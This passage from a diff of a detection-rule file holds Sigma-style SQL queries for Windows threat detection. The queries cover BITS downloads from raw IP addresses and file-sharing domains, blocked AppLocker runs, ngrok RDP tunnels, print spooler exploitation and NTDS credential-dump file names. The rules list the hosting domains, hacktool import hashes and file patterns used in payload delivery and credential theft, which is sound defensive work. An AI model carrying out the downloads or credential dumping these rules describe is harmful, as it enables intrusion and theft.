'%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND (processPath 
LIKE '%\\\\powershell.exe' ESCAPE '\\' OR processPath LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "create_stream_hash_hacktool_download.yml" + "filename": "win_bits_client_new_job_via_powershell.yml" }, { - "title": "Unusual File Download from Direct IP Address", - "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "title": "BITS Transfer Job Download From Direct IP", + "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "status": "experimental", - "description": "Detects the download of suspicious file type from URLs with IP", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE 
'\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" ], - "filename": "create_stream_hash_susp_ip_domains.yml" + "filename": "win_bits_client_new_transfer_via_ip_address.yml" }, { - "title": "Hidden Executable In NTFS Alternate Data Stream", - "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", - "status": "test", - "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable (non-empty imphash)", - "author": "Florian Roth (Nextron Systems), @0xrawsec", + "title": "BITS Transfer Job Download 
From File Sharing Domains", + "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "status": "experimental", + "description": "Detects BITS transfer job downloading files from a file sharing domain.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "create_stream_hash_ads_executable.yml" + "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml" }, { - "title": "Unusual File Download From File Sharing Websites", - "id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + 
"title": "BITS Transfer Job With Uncommon Or Suspicious Remote TLD", + "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "This rule doesn't exclude other known TLDs such as \".org\" or \".net\". It's recommended to apply additional filters for software and scripts that leverage the BITS service" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR 
TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT (((RemoteName LIKE '%.azureedge.net/%' ESCAPE '\\' OR RemoteName LIKE '%.com/%' ESCAPE '\\' OR RemoteName LIKE '%.sfx.ms/%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org/%' ESCAPE '\\'))))" ], - "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" + "filename": "win_bits_client_new_transfer_via_uncommon_tld.yml" }, { - "title": "Exports Registry Key To an Alternate Data Stream", - "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "title": "File Was Not Allowed To Run", + "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", "status": "test", - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. 
You need configure applocker and log collect to receive these events.", + "author": "Pushkarev Dmitry", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1204.002", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.006", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Need tuning applocker or add exceptions in SIEM" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', '8007', '8022', '8025'))" ], - "filename": "create_stream_hash_regedit_export_to_ads.yml" + "filename": "win_applocker_file_was_not_allowed_to_run.yml" }, { - "title": "Suspicious File Download From File Sharing Websites", - "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", + "title": "Ngrok Usage with Remote Desktop Service", + "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' 
ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" ], - "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" + "filename": "win_terminalservices_rdp_ngrok.yml" }, { - "title": "Suspicious Appended Extension", - "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", - "status": "experimental", - "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", - "author": "frack113", + "title": "CVE-2021-1675 Print Spooler Exploitation", + "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "status": "test", + "description": "Detects driver load events print service operational log 
that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.execution", + "attack.t1569", + "cve.2021.1675" ], "falsepositives": [ - "Backup software" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' ESCAPE '\\' OR TargetFilename LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" ], - "filename": "file_rename_win_ransomware.yml" + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" }, { - "title": "Rename Common File to DLL File", - "id": 
"bbfd974c-248e-4435-8de6-1e938c79c5c1", + "title": "Code Integrity Attempted DLL Load", + "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "status": "experimental", - "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", - "author": "frack113", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Application installation" + "Antivirus products" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE '%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR (SourceFilename = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = 
'1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\assembly\\\\GAC\\\\%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy IN ('1', '2')) OR (FileNameBuffer LIKE '%\\\\Program 
Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" ], - "filename": "file_rename_win_not_dll_to_dll.yml" + "filename": "win_codeintegrity_attempted_dll_load.yml" }, { - "title": "Suspicious NTDS Exfil Filename Patterns", - "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "status": "test", - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", - "author": "Florian Roth (Nextron Systems)", + "title": "Block Load Of Revoked Driver", + "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "description": "Detects blocked load attempts of revoked drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "status": "experimental", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" ], - "filename": "file_event_win_ntds_exfil_tools.yml" + "filename": "win_codeintegrity_revoked_driver.yml" }, { - "title": "SCR File Write Event", - "id": "c048f047-7e2a-4888-b302-55f509d4a91d", + "title": "Code Integrity Blocked Driver Load", + "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects the creation of screensaver files (.scr) outside of system folders. 
